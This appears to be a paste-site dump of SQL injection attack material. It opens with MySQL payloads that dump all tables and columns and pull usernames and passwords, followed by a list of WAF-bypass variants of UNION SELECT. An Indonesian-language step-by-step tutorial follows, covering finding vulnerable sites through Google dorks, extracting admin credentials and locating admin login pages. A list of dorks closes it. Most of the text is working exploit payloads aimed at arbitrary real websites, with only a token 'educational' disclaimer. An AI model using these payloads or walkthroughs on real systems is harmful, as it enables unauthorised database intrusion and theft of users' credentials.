  3761. (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'',column_name), (column_name))))))a)
  3762.  
  3763. 8. Show Each Table with Row Count and All Table Columns ---->
  3764.  
  3765. (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
  3766. ',column_name), (column_name))))))a)
  3767.  
  3768.  
  3769. 9. Show Each Table with Row Count & number order and All Table Columns --->
  3770.  
  3771. (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
  3772. ',column_name), (column_name))))))a)
  3773.  
  3774. Or
  3775.  
  3776. Bypass -->
  3777.  
  3778. (/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345'%69nformation_schema'*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)
  3779.  
  3780.  
  3781. 10. Extract Column Data from Table ------>
  3782.  
  3783. (select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
  3784.  
  3785. -h4rh4r
  3786.  
  3787. Sql Injection types
  3788. 1. Error Based Injections (Union Select)
  3789. 1. String
  3790. 2. Intiger
  3791. 2. Error Based Injections (Double Injection Based)
  3792. 3. BLIND Injections:
  3793. 1.Boolian Based
  3794. 2.Time Based
  3795. 4. Update Query Injection.
  3796. 5. Insert Query Injections.
  3797. 6. Header Injections.
  3798. 1.Referer based.
  3799. 2.UserAgent based.
  3800. 3.Cookie based.
  3801.  
  3802. MYSQL INJECTION - BYPASS UNION SELECT (WAF)
  3803. WHAT IS BYPASS : when target having WAF (web application firewall) secure encption or security on there server its cannot be directly get any vulnerble columns or its cannot be injeCted! so there haCker try to put diffrent query in combined charachaters encrpted,encoded,modifyed sql query parameters like one called UNION SELECT or UNION ALL SELECT!
  3804. there is all types of waf bypass method for bypass union select!
  3805. %55nion(%53elect 1,2,3)-- -
  3806. +union+distinct+select+
  3807. +union+distinctROW+select+
  3808. /**//*!12345UNION SELECT*//**/
  3809. /**//*!50000UNION SELECT*//**/
  3810. /**/UNION/**//*!50000SELECT*//**/
  3811. /*!50000UniON SeLeCt*/
  3812. union /*!50000%53elect*/
  3813. + #‎union + #‎select
  3814. + #‎1q %0AuNiOn all#qa%0A#%0AsEleCt
  3815. /*!%55NiOn*/ /*!%53eLEct*/
  3816. /*!u%6eion*//*!se%6cect*/
  3817. +un/**/ion+se/**/lect
  3818. uni%0bon+se%0blect
  3819. %2f**%2funion%2f**%2fselect
  3820. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  3821. REVERSE(noinu)+REVERSE(tceles)
  3822. /*--*/union/*--*/select/*--*/
  3823. union(/*!/**/SeleCT */ 1,2,3)
  3824. /*!union*/+/*!select*/
  3825. union+/*!select*/
  3826. /**/union/**/select/**/
  3827. /**/uNIon/**/sEleCt/**/
  3828. /**//*!union*//**//*!select*//**/
  3829. /*!uNIOn*//*!SelECt*/
  3830. +union+distinct+select+
  3831. +union+distinctROW+select+
  3832. uNiOn aLl sElEcT
  3833. if you got errors! please dnt loose hope! because in haCking! hope is your mirror of future in this ethical word lol i dnt want to be jesus forget these lines and try all method i m sure u got success soon! best of luck happy haCking! ;-)
  3834.  
  3835. ~h4rh4r
  3836.  
  3837. Di sini Anda akan menemukan tutorial langkah demi langkah yang sangat detail yang ditulis oleh saya (PhortyPhour) tentang injeksi SQL. Ini murni untuk tujuan pendidikan dan akan digunakan atas kebijaksanaan pembaca.
  3838.  
  3839. Pertama kita harus tahu persis apa itu injeksi SQL.
  3840.  
  3841. Injeksi SQL adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi di lapisan basis data aplikasi. Kerentanan hadir ketika input pengguna salah difilter untuk karakter string literal escape yang tertanam dalam pernyataan SQL atau input pengguna tidak diketik kuat dan dengan demikian secara tidak terduga dieksekusi. Ini adalah contoh dari kelas kerentanan yang lebih umum yang dapat terjadi setiap kali salah satu pemrograman atau bahasa scripting tertanam di dalam yang lain. Serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.
  3842.  
  3843. Itu adalah paragraf pertama dari halaman wikipedia untuk SQLi (injeksi SQL) ditemukan di sini:
  3844. http://en.wikipedia.org/wiki/SQL_injection
  3845.  
  3846. Saya akan menyarankan membaca seluruh halaman.
  3847.  
  3848. Apa yang dicakup dalam tutorial ini?
  3849.  
  3850. Bagian Satu - Penilaian Situs Web
  3851. Bagian Satu - Menemukan situs web yang rentan
  3852. Bagian Dua - Menentukan jumlah kolom
  3853. Bagian Tiga - Menemukan kolom mana yang rentan
  3854.  
  3855. Bagian Dua - Mengumpulkan Informasi
  3856. Bagian Satu - Menentukan versi SQL
  3857. Bagian Dua - Menemukan basis data
  3858.  
  3859. Bagian Tiga - The Good Stuff
  3860. Bagian Satu - Menemukan nama-nama tabel
  3861. Bagian Dua - Menemukan nama-nama kolom
  3862. Bagian Tiga - Menampilkan isi kolom
  3863. Bagian Empat - Mencari halaman admin
  3864.  
  3865. Sekarang mari kita mulai.
  3866.  
  3867. Bagian Satu - Penilaian Situs Web
  3868.  
  3869. Agar kami dapat mulai mengeksploitasi situs web, pertama-tama kami harus tahu persis apa yang kami suntikkan. Inilah yang akan kami bahas di Bagian Satu bersama dengan cara menilai informasi yang kami kumpulkan.
  3870.  
  3871. Bagian Satu - Menemukan situs web yang rentan
  3872.  
  3873. Situs web yang rentan dapat ditemukan menggunakan dorks (saya akan menyertakan daftar di akhir tutorial ini), baik di Google atau dengan pemindai eksploit. Bagi Anda yang tidak terbiasa dengan istilah "dorks", saya akan mencoba menjelaskan.
  3874.  
  3875. Dorks adalah URL situs web yang dikenal rentan. Dalam injeksi SQL, dorks ini terlihat seperti ini:
  3876.  
  3877. Kode:
  3878. inurl: buy.php? id =
  3879.  
  3880. Ini akan dimasukkan ke mesin pencari dan karena "inurl:" bagian dari dork, mesin pencari akan mengembalikan hasil dengan URL yang berisi karakter yang sama. Beberapa situs yang memiliki dork ini di situs web mereka mungkin rentan terhadap injeksi SQL.
  3881.  
  3882. Sekarang katakanlah kami menemukan halaman:
  3883.  
  3884. Kode:
  3885. http://www.site.com/buy.php?id=1
  3886.  
  3887. Untuk menguji situs ini, yang perlu kita lakukan adalah menambahkan 'baik di antara tanda "=" dan "1" atau setelah "1" sehingga terlihat seperti ini:
  3888.  
  3889. Kode:
  3890. http://www.site.com/buy.php?id=1 '
  3891. atau
  3892. http://www.site.com/buy.php?id='1
  3893.  
  3894. Setelah menekan enter, jika situs web ini mengembalikan kesalahan seperti berikut:
  3895.  
  3896. Kode:
  3897. Peringatan: mysql_fetch_array (): argumen yang disediakan bukanlah sumber daya hasil MySQL yang valid di /home1/michafj0/public_html/gallery.php on line 7
  3898.  
  3899. Atau sesuatu di sepanjang garis itu, ini berarti rentan terhadap injeksi.
  3900.  
  3901. Dalam kasus di mana Anda menemukan situs web seperti ini:
  3902.  
  3903. Kode:
  3904. http://www.site.com/buy.php?id=1&dog;catid=2
  3905.  
  3906. Maka Anda harus menggunakan teknik yang sama dengan menambahkan 'kecuali itu harus antara nilai (dalam hal ini nomor) dan operator ("=" tanda) sehingga terlihat seperti ini:
  3907.  
  3908. Kode:
  3909. http://www.site.com/buy.php?id='1&dog;catid='2
  3910.  
  3911. Ada program yang akan melakukan ini untuk Anda tetapi untuk memulai saya akan menyarankan hanya untuk melakukan hal-hal secara manual, menggunakan Google, dan jadi saya tidak akan memposting apa pun untuk Anda. Jika Anda merasa sangat terpaksa untuk menggunakan satu lagi. Saya merekomendasikan Exploit Scanner oleh Reiluke.
  3912.  
  3913. Bagian Dua - Menentukan jumlah kolom
  3914.  
  3915. Agar kami dapat menggunakan perintah dan mendapatkan hasil, kami harus tahu berapa banyak kolom yang ada di situs web. Jadi untuk menemukan jumlah kolom kita harus menggunakan metode yang sangat kompleks dan canggih yang saya suka sebut "Trial and Error" dengan perintah ORDER BY Biggrin
  3916.  
  3917. CATATAN: SQL tidak peduli apakah huruf Anda dikapitalisasi atau tidak dan saya hanya melakukannya karena kejelasan, karena semua yang peduli pertanyaan Anda bisa terlihat seperti ini:
  3918.  
  3919. Kode:
  3920. http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz dan ThX
  3921.  
  3922. TIDAK MASALAH (btw tolong jangan berpikir itu adalah perintah yang sebenarnya).
  3923.  
  3924. Jadi kembali ke perintah ORDER BY. Untuk menemukan jumlah kolom, kami menulis kueri dengan nilai inkrementing hingga kami mendapatkan kesalahan, seperti ini:
  3925.  
  3926. Kode:
  3927. http://www.site.com/buy.php?id=1 ORDER BY 1-- <--- Tidak ada kesalahan
  3928. http://www.site.com/buy.php?id=1 ORDER BY 2-- <--- Tidak ada kesalahan
  3929. http://www.site.com/buy.php?id=1 ORDER BY 3-- <--- Tidak ada kesalahan
  3930. http://www.site.com/buy.php?id=1 ORDER BY 4-- <--- Tidak ada kesalahan
  3931. http://www.site.com/buy.php?id=1 ORDER BY 5-- <--- ERROR!
  3932.  
  3933. Ini berarti ada empat kolom!
  3934.  
  3935. JANGAN LUPA UNTUK MENGUNGKAPKAN NULL DOUBLE (-) SETELAH QUERY.
  3936. SANGAT PENTING!
  3937.  
  3938. Bagian Tiga - Menemukan kolom mana yang rentan
  3939.  
  3940. Jadi kita tahu bahwa ada empat kolom sekarang kita harus mencari tahu mana yang rentan terhadap injeksi. Untuk melakukan ini, kami menggunakan UNION dan SELECT queries sambil mempertahankan double null (-) di akhir string. Ada juga perbedaan lain yang berukuran kecil tetapi tidak penting, lihat apakah Anda dapat menemukannya.
  3941.  
  3942. Kode:
  3943. http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--
  3944.  
  3945. Jika Anda tidak dapat menemukan perbedaannya, ini adalah nol tambahan di antara tanda "=" dan nilai (nomor).
  3946.  
  3947. buy.php? id = -1
  3948.  
  3949. Sekarang setelah memasukkan pertanyaan itu Anda harus dapat melihat beberapa angka di suatu tempat di halaman yang tampaknya tidak pada tempatnya. Itu adalah jumlah kolom yang rentan terhadap injeksi. Kita dapat menggunakan kolom-kolom itu untuk menarik informasi dari database yang akan kita lihat di Bagian Dua.
  3950.  
  3951. Bagian Dua - Mengumpulkan Informasi
  3952.  
  3953. Pada bagian ini kita akan menemukan bagaimana menemukan nama database dan versi SQL apa yang digunakan situs web dengan menggunakan kueri untuk mengeksploitasi situs.
  3954.  
  3955. Bagian Satu - Menentukan versi SQL.
  3956.  
  3957. Menemukan versi SQL dari situs web adalah langkah yang sangat penting karena langkah yang Anda ambil untuk versi 4 cukup berbeda dari versi 5 untuk mendapatkan apa yang Anda inginkan. Dalam tutorial ini, saya tidak akan membahas versi 4 karena ini adalah permainan menebak dan untuk jenis situs yang masih menggunakannya, itu tidak sebanding dengan waktu Anda.
  3958.  
  3959. Jika kita melihat kembali ke akhir Bagian Tiga di Bagian Satu kita melihat bagaimana menemukan kolom yang rentan. Menggunakan informasi itu kita dapat mengumpulkan pertanyaan berikutnya (saya akan menggunakan kolom 2). Perintah akan terlihat seperti ini:
  3960.  
  3961. Kode:
  3962. http://www.site.com/buy.php?id=-1 UNION SELECT 1, @@ version, 3,4--
  3963.  
  3964. Karena 2 adalah kolom rentan, di sinilah kita akan menempatkan "@@ version". String lain yang dapat menggantikan "@@ version" adalah "versi ()".
  3965.  
  3966. Jika situs web masih tidak menampilkan versi coba menggunakan unhex (hex ()) yang terlihat seperti ini:
  3967.  
  3968. Kode:
  3969. http://www.site.com/buy.php?id=-1 UNION SELECT 1, unhex (hex (@@ version)), 3,4--
  3970.  
  3971. CATATAN: Jika metode ini harus digunakan di sini, itu harus digunakan untuk sisa suntikan juga.
  3972.  
  3973. Sekarang apa yang ingin Anda lihat adalah sesuatu di bawah garis-garis ini:
  3974.  
  3975. Kode:
  3976. 5.1.47-komunitas-log
  3977.  
  3978. Yang merupakan versi dari SQL untuk situs web.
  3979.  
  3980. CATATAN: Jika Anda melihat versi 4 dan Anda ingin mencobanya, ada tutorial lain yang menjelaskan cara menyuntikkannya.
  3981.  
  3982. Bagian Dua - Menemukan basis data
  3983.  
  3984. Menemukan nama basis data tidak selalu merupakan langkah yang diperlukan untuk mengumpulkan informasi yang Anda inginkan, namun dalam pengalaman saya mengikuti langkah-langkah ini dan menemukan basis data terkadang dapat menghasilkan tingkat keberhasilan yang lebih tinggi.
  3985.  
  3986. Untuk menemukan database kami menggunakan query seperti yang di bawah ini:
  3987.  
  3988. Kode:
  3989. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (schema_name), 3,4 dari information_schema.schemata--
  3990.  
  3991. Ini terkadang menghasilkan lebih banyak hasil daripada yang diperlukan dan saat itulah kami beralih ke kueri ini:
  3992.  
  3993. Kode:
  3994. http://www.site.com/buy.php?id=-1 UNION SELECT 1, concat (database ()), 3,4--
  3995.  
  3996. Selamat! Anda sekarang memiliki nama database! Salin dan tempelkan nama di suatu tempat yang aman, kita akan membutuhkannya nanti.
  3997.  
  3998. Bagian Tiga - The Good Stuff
  3999.  
  4000. Ini adalah bagian yang menyenangkan di mana kami akan menemukan nama pengguna, email, dan kata sandi!
  4001.  
  4002. Bagian Satu - Menemukan nama-nama tabel
  4003.  
  4004. Untuk menemukan nama tabel kami menggunakan query yang mirip dengan yang digunakan untuk mencari database dengan sedikit tambahan tambahan:
  4005.  
  4006. Kode:
  4007. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (table_name), 3,4 FROM information_schema.tables WHERE table_schema = database () -
  4008.  
  4009. Mungkin terlihat panjang dan membingungkan tetapi setelah Anda memahaminya, itu tidak benar-benar saya akan coba jelaskan. Apa yang dilakukan oleh query ini adalah "groups" (group_concat) "nama tabel" (nama_tabel) bersama-sama dan mengumpulkan informasi tersebut "dari" (FROM) information_schema.tables di mana "skema tabel" (table_schema) dapat ditemukan di "basis data "(database ()).
  4010.  
  4011. CATATAN: Saat menggunakan group_concat Anda hanya akan dapat melihat tabel 1024 karakter, jadi jika Anda melihat bahwa tabel terputus pada saklar akhir untuk membatasi yang akan saya jelaskan sekarang.
  4012.  
  4013. Kode:
  4014. http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 FROM information_schema.tables WHERE table_schema = database () LIMIT 0,1--
  4015.  
  4016. Apa yang dilakukan adalah menampilkan tabel pertama dan satu-satunya yang pertama. Jadi jika kita kehabisan karakter, katakanlah tabel ke-31 kita bisa menggunakan query ini:
  4017.  
  4018. Kode:
  4019. http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 FROM information_schema.tables WHERE table_schema = database () LIMIT 30,1--
  4020.  
  4021. Perhatikan bagaimana batas saya adalah 30,1 bukannya 31,1? Ini karena ketika menggunakan batas dimulai dari 0,1 yang berarti bahwa ke-30 sebenarnya adalah Tongue ke-31
  4022.  
  4023. Anda sekarang memiliki semua nama tabel!
  4024.  
  4025.  
  4026. Bagian Dua - Menemukan nama-nama kolom
  4027.  
  4028. Sekarang setelah Anda memiliki semua nama tabel coba dan pilih salah satu yang menurut Anda akan berisi informasi berair. Biasanya mereka adalah tabel seperti User (s), Admin (s), tblUser (s) dan sebagainya tetapi itu bervariasi antar situs.
  4029.  
  4030. Setelah menentukan tabel mana yang menurut Anda berisi informasi, gunakan kueri ini (dalam contoh saya, saya akan menggunakan nama tabel "Admin"):
  4031.  
  4032. Kode:
  4033. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = "Admin" -
  4034.  
  4035. Ini akan memberi Anda daftar semua kolom di dalam tabel atau memberi Anda kesalahan tetapi jangan panik jika hasilnya # 2! Semua ini berarti bahwa Kutipan Sihir diaktifkan. Ini dapat dilewati dengan menggunakan hex atau char converter (keduanya berfungsi) untuk mengonversi teks normal menjadi char atau hex (tautan ke situs web yang melakukan ini akan dimasukkan di akhir tutorial).
  4036.  
  4037. PEMBARUAN: Jika Anda mendapatkan kesalahan pada titik ini, yang harus Anda lakukan adalah ikuti langkah-langkah berikut:
  4038.  
  4039. 1. Salin nama tabel yang Anda coba akses.
  4040. 2. Tempelkan nama tabel ke dalam situs web ini yang bertuliskan "Say Hello To My Little Friend".
  4041. Konverter Hex / Char
  4042. http://www.swingnote.com/tools/texttohex.php
  4043. 3. Klik konversikan.
  4044. 4. Salin string angka / huruf di bawah Hex ke dalam kueri Anda sehingga terlihat seperti ini:
  4045.  
  4046. Kode:
  4047. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = 0x41646d696e--
  4048.  
  4049. Perhatikan bagaimana sebelum saya menempelkan hex saya menambahkan "0x", semua ini memberitahu server bahwa karakter berikut adalah bagian dari string hex.
  4050.  
  4051. Anda sekarang harus melihat daftar semua kolom dalam tabel seperti nama pengguna, kata sandi, dan email.
  4052.  
  4053. CATATAN: Menggunakan fungsi batas berfungsi dengan kolom juga.
  4054.  
  4055. Bagian Tiga - Menampilkan isi kolom
  4056.  
  4057. Kami hampir selesai! Yang harus kita lakukan adalah melihat apa yang ada di dalam kolom itu dan menggunakan informasi untuk masuk! Untuk melihat kolom yang kita butuhkan untuk memutuskan mana yang ingin kita lihat dan kemudian menggunakan query ini (dalam contoh ini saya ingin melihat kolom "username", "password", dan "email", dan nama database saya akan "db123 "). Di sinilah nama database berguna:
  4058.  
  4059. Kode:
  4060. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (nama pengguna, 0x3a, kata sandi, 0x3a, email), 3,4 DARI db123.Admin--
  4061.  
  4062. Dalam query ini, 0x3a adalah nilai hex dari titik dua (:) yang akan mengelompokkan username: password: email untuk masing-masing pengguna begitu saja.
  4063.  
  4064. AKHIRNYA! Sekarang Anda memiliki informasi login untuk pengguna situs, termasuk admin. Yang harus Anda lakukan sekarang adalah menemukan halaman login admin yang membawa kita ke Bagian Empat.
  4065.  
  4066. Bagian Empat - Mencari halaman admin
  4067.  
  4068. Biasanya halaman admin akan langsung dari halaman beranda situs, berikut beberapa contohnya:
  4069.  
  4070. Kode:
  4071. http://www.site.com/admin
  4072. http://www.site.com/adminlogin
  4073. http://www.site.com/modlogin
  4074. http://www.site.com/moderator
  4075.  
  4076. Sekali lagi ada program yang akan menemukan halaman untuk Anda tetapi pertama-tama cobalah beberapa tebakan dasar, itu mungkin menghemat beberapa klik. Jika Anda menggunakan program Reiluke telah mengkodekan satu untuk itu juga. Cari Admin Finder oleh Reiluke.
  4077.  
  4078. Dan itu termasuk tutorial saya! Saya harap ini bermanfaat bagi sebagian dari Anda. Ingatlah untuk terus berlatih dan akhirnya Anda akan memiliki semua pertanyaan yang dihafalkan dalam waktu singkat!
  4079.  
  4080. Komentar dan Nilai!
  4081.  
  4082. Berikan kredit di mana kredit jatuh tempo!
  4083.  
  4084. Saya menepati janji saya jadi di sini adalah apa yang saya katakan akan saya sertakan:
  4085.  
  4086. Daftar Dork
  4087. trainers.php? id =
  4088. article.php? ID =
  4089. play_old.php? id =
  4090. declaration_more.php? decl_id =
  4091. Pageid =
  4092. games.php? id =
  4093. newsDetail.php? id =
  4094. staff_id =
  4095. historialeer.php? num =
  4096. product-item.php? id =
  4097. news_view.php? id =
  4098. humor.php? id =
  4099. communique_detail.php? id =
  4100. sem.php3? id =
  4101. opinions.php? id =
  4102. spr.php? id =
  4103. pages.php? id =
  4104. chappies.php? id =
  4105. prod_detail.php? id =
  4106. viewphoto.php? id =
  4107. view.php? id =
  4108. website.php? id =
  4109. hosting_info.php? id =
  4110. gery.php? id =
  4111. detail.php? ID =
  4112. publikasi.php? id =
  4113. Productinfo.php? Id =
  4114. releases.php? id =
  4115. ray.php? id =
  4116. produit.php? id =
  4117. pop.php? id =
  4118. shopping.php? id =
  4119. productdetail.php? id =
  4120. post.php? id =
  4121. section.php? id =
  4122. theme.php? id =
  4123. page.php? id =
  4124. shredder-categories.php? id =
  4125. product_ranges_view.php? ID =
  4126. shop_category.php? id =
  4127. channel_id =
  4128. newsid =
  4129. news_display.php? getid =
  4130. ages.php? id =
  4131. clanek.php4? id =
  4132. review.php? id =
  4133. iniziativa.php? in =
  4134. kurikulum.php? id =
  4135. labels.php? id =
  4136. lihat.php? ID =
  4137. galeri_info.php? l =
  4138. tekst.php? idt =
  4139. newscat.php? id =
  4140. newsticker_info.php? idn =
  4141. rubrika.php? idr =
  4142. offer.php? idf =
  4143.  
  4144. Ada daftar dork yang lebih luas yang dapat ditemukan.
  4145.  
  4146. Konverter Hex / Char
  4147. http://www.swingnote.com/tools/texttohex.php
Add Comment
Please, Sign In to add comment